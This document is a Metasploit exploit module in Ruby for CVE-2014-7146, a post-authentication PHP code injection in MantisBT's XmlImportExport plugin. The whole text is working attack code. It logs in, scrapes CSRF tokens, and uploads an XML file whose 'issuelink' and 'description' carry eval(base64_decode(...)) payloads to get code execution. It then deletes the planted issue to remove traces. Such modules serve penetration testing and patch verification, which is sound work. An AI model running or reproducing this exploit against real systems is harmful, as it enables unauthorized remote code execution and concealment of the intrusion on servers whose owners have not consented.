MantisBT XmlImportExport Plugin PHP Code Injection

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability',  
'Description' => %q{  
This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed.  
The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier.  
This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Egidio Romano', # discovery http://karmainsecurity.com  
'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco  
],  
'References' =>  
[  
['CVE', '2014-7146']  
],  
'Platform' => 'php',  
'Arch' => ARCH_PHP,  
'Targets' => [['Generic (PHP Payload)', {}]],  
'DisclosureDate' => 'Nov 8 2014',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('USERNAME', [ true, 'Username to authenticate as', 'administrator']),  
OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'root']),  
OptString.new('TARGETURI', [ true, 'Base directory path', '/'])  
], self.class)  
end  
  
def check  
res = exec_php('phpinfo(); die();', true)  
  
if res && res.body =~ /This program makes use of the Zend/  
return Exploit::CheckCode::Vulnerable  
else  
return Exploit::CheckCode::Unknown  
end  
end  
  
def do_login()  
print_status('Checking access to MantisBT...')  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'login_page.php'),  
'vars_get' => {  
'return' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import')  
}  
})  
  
fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && res.code == 200  
  
session_cookie = res.get_cookies  
  
print_status('Logging in...')  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'login.php'),  
'cookie' => session_cookie,  
'vars_post' => {  
'return' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),  
'username' => datastore['username'],  
'password' => datastore['password'],  
'secure_session' => 'on'  
}  
})  
  
  
fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302  
  
fail_with(Failure::NoAccess, 'Wrong credentials') unless res.redirection.to_s !~ /login_page.php/  
  
"#{session_cookie} #{res.get_cookies}"  
end  
  
def upload_xml(payload_b64, rand_text, cookies, is_check)  
  
if is_check  
timeout = 20  
else  
timeout = 3  
end  
  
rand_num = Rex::Text.rand_text_numeric(1, 9)  
  
print_status('Checking XmlImportExport plugin...')  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'plugin.php'),  
'cookie' => cookies,  
'vars_get' => {  
'page' => 'XmlImportExport/import'  
}  
})  
  
unless res && res.code == 200  
print_error('Error trying to access XmlImportExport/import page...')  
return false  
end  
  
# Retrieving CSRF token  
if res.body =~ /name="plugin_xml_import_action_token" value="(.*)"/  
csrf_token = Regexp.last_match[1]  
else  
print_error('Error trying to read CSRF token')  
return false  
end  
  
# Retrieving default project id  
if res.body =~ /name="project_id" value="([0-9]+)"/  
project_id = Regexp.last_match[1]  
else  
print_error('Error trying to read project id')  
return false  
end  
  
# Retrieving default category id  
if res.body =~ /name="defaultcategory">[.|\r|\r\n]*<option value="([0-9])" selected="selected" >\(select\)<\/option><option value="1">\[All Projects\] (.*)<\/option>/  
category_id = Regexp.last_match[1]  
category_name = Regexp.last_match[2]  
else  
print_error('Error trying to read default category')  
return false  
end  
  
# Retrieving default max file size  
if res.body =~ /name="max_file_size" value="([0-9]+)"/  
max_file_size = Regexp.last_match[1]  
else  
print_error('Error trying to read default max file size')  
return false  
end  
  
# Retrieving default step  
if res.body =~ /name="step" value="([0-9]+)"/  
step = Regexp.last_match[1]  
else  
print_error('Error trying to read default step value')  
return false  
end  
  
xml_file = %Q|  
<mantis version="1.2.17" urlbase="http://localhost/" issuelink="${eval(base64_decode(#{ payload_b64 }))}}" notelink="~" format="1">  
<issue>  
<id>#{ rand_num }</id>  
<project id="#{ project_id }">#{ rand_text }</project>  
<reporter id="#{ rand_num }">#{ rand_text }</reporter>  
<priority id="30">normal</priority>  
<severity id="50">minor</severity>  
<reproducibility id="70">have not tried</reproducibility>  
<status id="#{ rand_num }">new</status>  
<resolution id="#{ rand_num }">open</resolution>  
<projection id="#{ rand_num }">none</projection>  
<category id="#{ category_id }">#{ category_name }</category>  
<date_submitted>1415492267</date_submitted>  
<last_updated>1415507582</last_updated>  
<eta id="#{ rand_num }">none</eta>  
<view_state id="#{ rand_num }">public</view_state>  
<summary>#{ rand_text }</summary>  
<due_date>1</due_date>  
<description>{${eval(base64_decode(#{ payload_b64 }))}}1</description>  
</issue>  
</mantis>  
|  
  
data = Rex::MIME::Message.new  
data.add_part("#{ csrf_token }", nil, nil, "form-data; name=\"plugin_xml_import_action_token\"")  
data.add_part("#{ project_id }", nil, nil, "form-data; name=\"project_id\"")  
data.add_part("#{ max_file_size }", nil, nil, "form-data; name=\"max_file_size\"")  
data.add_part("#{ step }", nil, nil, "form-data; name=\"step\"")  
data.add_part(xml_file, "text/xml", "UTF-8", "form-data; name=\"file\"; filename=\"#{ rand_text }.xml\"")  
data.add_part("renumber", nil, nil, "form-data; name=\"strategy\"")  
data.add_part("link", nil, nil, "form-data; name=\"fallback\"")  
data.add_part("on", nil, nil, "form-data; name=\"keepcategory\"")  
data.add_part("#{ category_id }", nil, nil, "form-data; name=\"defaultcategory\"")  
data_post = data.to_s  
  
print_status('Sending payload...')  
return send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import_action'),  
'cookie' => cookies,  
'ctype' => "multipart/form-data; boundary=#{ data.bound }",  
'data' => data_post  
}, timeout)  
end  
  
def exec_php(php_code, is_check = false)  
  
# remove comments, line breaks and spaces of php_code  
payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')  
  
# clean b64 payload  
while Rex::Text.encode_base64(payload_clean) =~ /=/  
payload_clean = "#{ payload_clean } "  
end  
payload_b64 = Rex::Text.encode_base64(payload_clean)  
  
rand_text = Rex::Text.rand_text_alpha(5, 8)  
  
cookies = do_login()  
  
res_payload = upload_xml(payload_b64, rand_text, cookies, is_check)  
  
# When a meterpreter session is active, communication with the application is lost.  
# Must login again in order to recover the communication. Thanks to @FireFart for figure out how to fix it.  
cookies = do_login()  
  
print_status("Deleting issue (#{ rand_text })...")  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'my_view_page.php'),  
'cookie' => cookies  
})  
  
unless res && res.code == 200  
print_error('Error trying to access My View page')  
return false  
end  
  
if res.body =~ /title="\[@[0-9]+@\] #{ rand_text }">0+([0-9]+)<\/a>/  
issue_id = Regexp.last_match[1]  
else  
print_error('Error trying to retrieve issue id')  
return false  
end  
  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'bug_actiongroup_page.php'),  
'cookie' => cookies,  
'vars_get' => {  
'bug_arr[]' => issue_id,  
'action' => 'DELETE',  
},  
})  
  
if res && res.body =~ /name="bug_actiongroup_DELETE_token" value="(.*)"\/>/  
csrf_token = Regexp.last_match[1]  
else  
print_error('Error trying to retrieve CSRF token')  
return false  
end  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'bug_actiongroup.php'),  
'cookie' => cookies,  
'vars_post' => {  
'bug_actiongroup_DELETE_token' => csrf_token,  
'bug_arr[]' => issue_id,  
'action' => 'DELETE',  
},  
})  
  
if res && res.code == 302 || res.body !~ /Issue #{ issue_id } not found/  
print_status("Issue number (#{ issue_id }) removed")  
else  
print_error("Removing issue number (#{ issue_id }) has failed")  
return false  
end  
  
# if check return the response  
if is_check  
return res_payload  
else  
return true  
end  
end  
  
def exploit  
unless exec_php(payload.encoded)  
fail_with(Failure::Unknown, 'Exploit failed, aborting.')  
end  
end  
end  
`